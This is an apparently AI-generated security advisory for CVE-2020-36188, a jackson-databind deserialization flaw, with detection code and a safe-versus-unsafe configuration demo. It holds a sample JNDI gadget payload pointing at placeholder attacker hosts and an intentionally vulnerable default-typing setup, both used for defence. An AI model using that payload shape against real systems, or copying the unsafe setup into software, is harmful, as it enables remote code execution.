CVE-2020-36188 Overview
CVE-2020-36188 is an insecure deserialization vulnerability in FasterXML jackson-databind 2.x versions before 2.9.10.8. Jackson mishandles the interaction between serialization gadgets and polymorphic typing for com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource, a copy of logback's JNDIConnectionSource that the New Relic Java agent ships under a shaded package name. When polymorphic type handling is enabled, an attacker who controls the JSON can name this class as the type to instantiate and supply the JNDI location it will look up; pointing that lookup at an attacker-controlled naming service can lead to arbitrary code execution.
Critical Impact
Unauthenticated remote attackers who can submit JSON to a vulnerable endpoint can achieve remote code execution through the JNDIConnectionSource gadget, potentially compromising enterprise systems running vulnerable jackson-databind versions.
Affected Products
- FasterXML jackson-databind 2.x before 2.9.10.8
- NetApp Cloud Backup and Service Level Manager
- Debian Linux 9.0
- Oracle Agile PLM, Application Testing Suite, and AutoVue for Agile PLM
- Oracle Banking products (Corporate Lending, Credit Facilities, Extensibility Workbench, Supply Chain Finance, Treasury Management, Virtual Account Management)
- Oracle Communications products (Billing and Revenue Management, Cloud Native Core, Diameter Signaling Route, Element Manager, and others)
- Oracle Commerce Platform, Data Integrator, Documaker, and GoldenGate Application Adapters
- Oracle Primavera Gateway and Unifier
- Oracle Retail products (Customer Management, Merchandising System, Service Backbone, XStore Point of Service)
- Oracle WebCenter Portal
Discovery Timeline
- 2021-01-06 - CVE-2020-36188 published to NVD
- 2024-11-21 - Last updated in NVD database
Technical Details for CVE-2020-36188
Vulnerability Analysis
This vulnerability is one of a long series of jackson-databind issues that abuse unsafe polymorphic type handling. The precondition is an application that lets the JSON choose the Java class to instantiate: either default typing (enableDefaultTyping(), or in 2.10+ activateDefaultTyping() with a permissive validator) or a @JsonTypeInfo(use = JsonTypeInfo.Id.CLASS) annotation on a property whose declared type is broad, such as Object. The com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource class is the "gadget": an otherwise legitimate class whose bean properties do something dangerous when driven by attacker data.
When the JSON names this class as the type id, jackson-databind instantiates it and calls its setters with the supplied values, including the setter for the JNDI location. In logback's JNDIConnectionSource the actual InitialContext lookup of that location is performed when getConnection() is invoked, not in the constructor; Jackson treats getConnection() as a bean getter, so the lookup fires when the application serializes the object back out (for example, echoing the parsed value in a response), which is the usual trigger for this family of gadgets. The lookup can be directed at an attacker-controlled LDAP or RMI server. On a JVM that still trusts remote codebases the naming response can make the JVM download and run an attacker-supplied class; on a JVM where com.sun.jndi.ldap.object.trustURLCodebase and com.sun.jndi.rmi.object.trustURLCodebase are false (the default since JDK 8u191 and 8u121 respectively) the attacker instead returns a serialized object and relies on a local deserialization gadget chain.
Exploitation requires both polymorphic type handling enabled for untrusted input and the gadget class on the application's classpath (it arrives with the New Relic Java agent). No authentication is needed for the network-facing JSON endpoint, but NVD rates the attack complexity as high because of these prerequisites.
Root Cause
The root cause is CWE-502: Deserialization of Untrusted Data. Jackson-databind's polymorphic type handling feature allows JSON to specify the Java class to instantiate during deserialization. Without a validator that restricts the resolvable types, attackers can specify dangerous "gadget" classes whose setters or getters perform harmful operations. The JNDIConnectionSource gadget leverages Java's JNDI functionality to initiate outbound connections that can result in code execution. The 2.9.x fix line addresses each gadget by adding it to a blocklist, which is reactive by nature; the structural fix is the allowlist-based PolymorphicTypeValidator introduced in 2.10.
Attack Vector
The attack exploits network-reachable endpoints that pass client-supplied JSON to jackson-databind with polymorphic typing enabled. The attacker sends a JSON payload whose type id names the JNDIConnectionSource class, with a property carrying the JNDI location to resolve. When the application deserializes it:
- jackson-databind resolves the type id to the gadget class and instantiates it
- Jackson populates the object through its setters, storing the attacker-specified JNDI location
- when getConnection() is invoked (Jackson calls it as a bean getter if the object is serialized back out), the class performs an InitialContext lookup of that location
- the lookup connects to an attacker-controlled LDAP or RMI server
- the server answers with a reference to a remote codebase, or with a serialized object
- a JVM that trusts remote codebases loads and executes the attacker's class; otherwise the attacker relies on a local deserialization gadget chain
The payload carries the gadget class name in the type id position (the @class property when @JsonTypeInfo(use = Id.CLASS) is used, or the first element of a ["class", {...}] array when default typing applies to an Object-typed property) together with the malicious JNDI URL (e.g., ldap://attacker.com/Exploit).
Detection Methods for CVE-2020-36188
Indicators of Compromise
- Outbound LDAP or RMI connections from application servers to unexpected external hosts; attacker tooling commonly listens on 1389 (LDAP) or 1099 (RMI), but any port can be used, so match on protocol rather than port
- JSON payloads containing references to com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource
- Application logs showing deserialization errors mentioning JNDI-related classes
- Unexpected Java class loading activity or new class files appearing in application directories
- Network traffic patterns indicating LDAP/RMI connections following HTTP JSON requests
Detection Strategies
- Deploy web application firewall (WAF) or API-gateway rules that parse JSON bodies and flag type ids (such as @class) naming JNDIConnectionSource or other blocklisted gadget classes, together with string values beginning with ldap://, ldaps:// or rmi://; parse the body rather than regex the raw bytes, because Jackson decodes \u escapes that a byte-pattern rule would miss
- Monitor network traffic for outbound LDAP or RMI connections, especially to non-corporate destinations
- Implement application-level logging to capture deserialization activities and type resolution attempts
- Use Software Composition Analysis (SCA) tools to inventory jackson-databind versions across all applications
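The screen below is an added example, not code from the original page or from the jackson-databind project. It implements the first two indicators and the WAF strategy above as a request-body check: it parses the JSON with Jackson's tree model (so \u-escaped class names are seen decoded, exactly as the application would see them), flags type ids that fall under the gadget's package, including the two-element array form that default typing uses for Object-typed properties, and flags string values that look like JNDI URLs. It assumes jackson-databind on the classpath and Java 11 or later; the prefix list, the placeholder attacker hostname and the two sample bodies are constructed for the demo, and the class never instantiates anything named in the input.

```java
// Added example, not from the original page or from jackson-databind.
// A request-body screen for the payload shape described under Attack Vector.
// Assumes jackson-databind on the classpath. Prefixes, hostnames and sample
// bodies below are constructed for this demo.
import com.fasterxml.jackson.databind.JsonNode;
import com.fasterxml.jackson.databind.ObjectMapper;
import java.util.ArrayList;
import java.util.Iterator;
import java.util.List;
import java.util.Map;
import java.util.regex.Pattern;

public class JsonGadgetScreen {
    // Property names Jackson commonly uses for type ids; "@class" is the default for Id.CLASS.
    private static final List<String> TYPE_ID_PROPERTIES = List.of("@class", "@type", "type", "class");
    // Package prefixes covering the gadget named in this CVE and the logback original it shades.
    // Extend this list from jackson-databind's blocklist rather than from one CVE.
    private static final List<String> GADGET_PREFIXES = List.of(
            "com.newrelic.agent.deps.ch.qos.logback.core.db.",
            "ch.qos.logback.core.db.");
    // JNDI provider URL schemes an attacker would point a lookup at.
    private static final Pattern JNDI_URL =
            Pattern.compile("^(ldap|ldaps|rmi|dns|iiop)://", Pattern.CASE_INSENSITIVE);
    // Used only to build a tree; it never resolves or instantiates a class named in the body.
    private static final ObjectMapper PARSER = new ObjectMapper();

    /** Returns human-readable findings for one JSON body (empty list means nothing suspicious). */
    public static List<String> findings(String json) throws Exception {
        List<String> hits = new ArrayList<>();
        walk(PARSER.readTree(json), "$", hits);
        return hits;
    }

    private static void walk(JsonNode node, String path, List<String> hits) {
        if (node.isObject()) {
            for (Iterator<Map.Entry<String, JsonNode>> it = node.fields(); it.hasNext();) {
                Map.Entry<String, JsonNode> f = it.next();
                String childPath = path + "." + f.getKey();
                if (TYPE_ID_PROPERTIES.contains(f.getKey()) && f.getValue().isTextual()) {
                    checkTypeId(f.getValue().asText(), childPath, hits);
                }
                walk(f.getValue(), childPath, hits);
            }
        } else if (node.isArray()) {
            // Default typing for a declared Object/abstract type emits ["class.name", { ...props }].
            if (node.size() == 2 && node.get(0).isTextual()) {
                checkTypeId(node.get(0).asText(), path + "[0]", hits);
            }
            for (int i = 0; i < node.size(); i++) {
                walk(node.get(i), path + "[" + i + "]", hits);
            }
        } else if (node.isTextual() && JNDI_URL.matcher(node.asText()).find()) {
            hits.add("JNDI URL at " + path + ": " + node.asText());
        }
    }

    private static void checkTypeId(String id, String path, List<String> hits) {
        for (String prefix : GADGET_PREFIXES) {
            if (id.startsWith(prefix)) {
                hits.add("gadget type id at " + path + ": " + id);
                return;
            }
        }
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample bodies; attacker.example is a placeholder, not a real server.
        String benign = "{\"name\":\"alice\",\"roles\":[\"user\"]}";
        String attack = "[\"com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource\","
                + "{\"jndiLocation\":\"ldap://attacker.example/Exploit\"}]";
        for (String body : List.of(benign, attack)) {
            System.out.println(body + " -> " + findings(body));
        }
    }
}
```

Running main prints no findings for the benign body and two for the constructed attack body (the gadget type id at $[0] and the JNDI URL at $[1].jndiLocation). Treat this as a detection layer that buys time and telemetry, not as a substitute for the upgrade: a gadget outside GADGET_PREFIXES passes the screen untouched.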
Monitoring Recommendations
- Configure SIEM rules to alert on JNDI-related patterns in application logs
- Monitor DNS resolution from application servers: a lookup of an unfamiliar hostname immediately after an inbound JSON request, followed by an LDAP or RMI connection to the resolved address, is a strong exploitation signal
- Establish baseline network behavior and alert on anomalous outbound connections from Java applications
- Review application error logs for InvalidTypeIdException, or for a JsonMappingException whose message reads "Illegal type (...) to deserialize: prevented for security reasons" (the wording jackson-databind's 2.9.x blocklist emits); either indicates a blocked gadget class and therefore an exploitation attempt against an already patched instance
How to Mitigate CVE-2020-36188
Immediate Actions Required
- Upgrade FasterXML jackson-databind to version 2.9.10.8 or later; 2.10.x and newer are recommended because they deprecate enableDefaultTyping() and require a PolymorphicTypeValidator to activate default typing
- Audit all applications for usage of polymorphic type handling features (enableDefaultTyping(), @JsonTypeInfo)
- Disable default typing unless absolutely required for application functionality
- Apply Oracle Critical Patch Updates for affected Oracle products
Patch Information
FasterXML has released jackson-databind version 2.9.10.8 which adds com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource to the blocklist of dangerous gadget classes. The fix prevents this specific class from being instantiated during polymorphic deserialization.
For comprehensive details on jackson-databind security considerations, refer to the Medium Blog on Jackson CVEs. Technical details about the specific issue are available in GitHub Issue #2996.
Oracle has addressed this vulnerability in multiple Critical Patch Updates including Oracle CPU April 2021, Oracle CPU July 2021, Oracle CPU October 2021, Oracle CPU January 2022, and Oracle CPU April 2022. NetApp has also issued Security Advisory NTAP-20210205-0005.
Workarounds
- If upgrading to 2.9.10.8 is not immediately possible but 2.10+ is available, configure the ObjectMapper with a PolymorphicTypeValidator (BasicPolymorphicTypeValidator) that allows only the application's own base types; on 2.9.x there is no validator API, so disable default typing for untrusted input instead
- Implement strict input validation to reject JSON containing unexpected type identifiers
- Do not load the New Relic Java agent (-javaagent:newrelic.jar) on hosts where it is not required; the gadget is a logback class shaded inside that agent, so leaving the agent out takes the class off the classpath
- Use network segmentation to restrict outbound LDAP/RMI connections from application servers
- Keep the JVM system properties com.sun.jndi.ldap.object.trustURLCodebase and com.sun.jndi.rmi.object.trustURLCodebase at false (the default since JDK 8u191 and 8u121) so a JNDI reference cannot pull classes from a remote codebase; this blunts the remote class-loading step but does not stop the outbound connection or local gadget chains
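As an added example (not code from this page or from the jackson-databind project) of the precondition described under Vulnerability Analysis and of the PolymorphicTypeValidator workaround above, the program below puts the unsafe configuration beside two hardened ones. It assumes jackson-databind 2.10 or later on the classpath; the SideEffect class is a hypothetical stand-in for a gadget whose setter merely records that it ran, and Shape/Circle are a hypothetical application model.

```java
// Added example, not from the original page or from jackson-databind.
// Unsafe default typing beside two hardened alternatives. Assumes jackson-databind 2.10+.
// SideEffect is a hypothetical gadget stand-in; Shape/Circle are a hypothetical app model.
import com.fasterxml.jackson.annotation.JsonSubTypes;
import com.fasterxml.jackson.annotation.JsonTypeInfo;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.exc.InvalidTypeIdException;
import com.fasterxml.jackson.databind.jsontype.BasicPolymorphicTypeValidator;
import com.fasterxml.jackson.databind.jsontype.PolymorphicTypeValidator;

public class DefaultTypingDemo {

    // Hypothetical "gadget": a real one would perform a JNDI lookup or similar in a setter/getter.
    public static class SideEffect {
        static boolean triggered = false;
        public void setTarget(String target) { triggered = true; }
    }

    // Hardened alternative (b): no default typing; the set of resolvable subtypes is closed by annotation.
    @JsonTypeInfo(use = JsonTypeInfo.Id.NAME, property = "type")
    @JsonSubTypes({ @JsonSubTypes.Type(value = Circle.class, name = "circle") })
    public interface Shape {}
    public static class Circle implements Shape { public double radius; }

    public static void main(String[] args) throws Exception {
        // Payload shape default typing expects for a declared type of Object:
        // a two-element array [class name, properties]. Constructed for this demo.
        String payload = "[\"" + SideEffect.class.getName() + "\", {\"target\": \"x\"}]";

        // 1. VULNERABLE: enableDefaultTyping() lets the JSON pick any loadable class.
        ObjectMapper unsafe = new ObjectMapper();
        unsafe.enableDefaultTyping();   // deprecated since 2.10 for exactly this reason
        Object o = unsafe.readValue(payload, Object.class);
        System.out.println("unsafe mapper instantiated " + o.getClass().getName()
                + ", gadget setter ran: " + SideEffect.triggered);

        // 2. HARDENED (a): default typing only behind an allow-list validator.
        PolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
                .allowIfSubType(Shape.class)   // only the application's own model types resolve
                .build();
        ObjectMapper safe = new ObjectMapper();
        safe.activateDefaultTyping(ptv, ObjectMapper.DefaultTyping.OBJECT_AND_NON_CONCRETE);
        try {
            safe.readValue(payload, Object.class);
        } catch (InvalidTypeIdException e) {
            System.out.println("validator rejected type id: " + e.getTypeId());
        }

        // 3. HARDENED (b): no default typing at all; logical names, never class names, select the subtype.
        ObjectMapper plain = new ObjectMapper();
        Shape s = plain.readValue("{\"type\":\"circle\",\"radius\":2.5}", Shape.class);
        System.out.println("annotation-based typing produced " + s.getClass().getSimpleName());
        try {
            plain.readValue("{\"type\":\"" + SideEffect.class.getName() + "\"}", Shape.class);
        } catch (InvalidTypeIdException e) {
            System.out.println("unknown type name rejected: " + e.getTypeId());
        }
    }
}
```

The first mapper instantiates whatever the JSON names and runs its setter; the second rejects the same payload before the gadget's properties are populated; the third never consults a class name at all, which is the configuration to aim for on untrusted input. Note that the validator in step 2 still loads the named class to check it against Shape (static initializers run), so prefer the name-based allowIfSubType(String prefix) form when the class name alone is enough to decide.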
Maven dependency update example. Pin the patched version in pom.xml, preferably under dependencyManagement so that transitive copies pulled in by other libraries are overridden as well:

<dependency>
  <groupId>com.fasterxml.jackson.core</groupId>
  <artifactId>jackson-databind</artifactId>
  <version>2.9.10.8</version>
</dependency>

# List every copy of jackson-databind in the build, including transitive ones
mvn dependency:tree -Dincludes=com.fasterxml.jackson.core:jackson-databind
# Rewrite the pom to the patched version (versions-maven-plugin), forcing it even where a newer range is declared
mvn versions:use-dep-version -Dincludes=com.fasterxml.jackson.core:jackson-databind -DdepVersion=2.9.10.8 -DforceVersion=true
# Re-run the tree afterwards and confirm no older version remains
mvn dependency:tree -Dincludes=com.fasterxml.jackson.core:jackson-databind
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.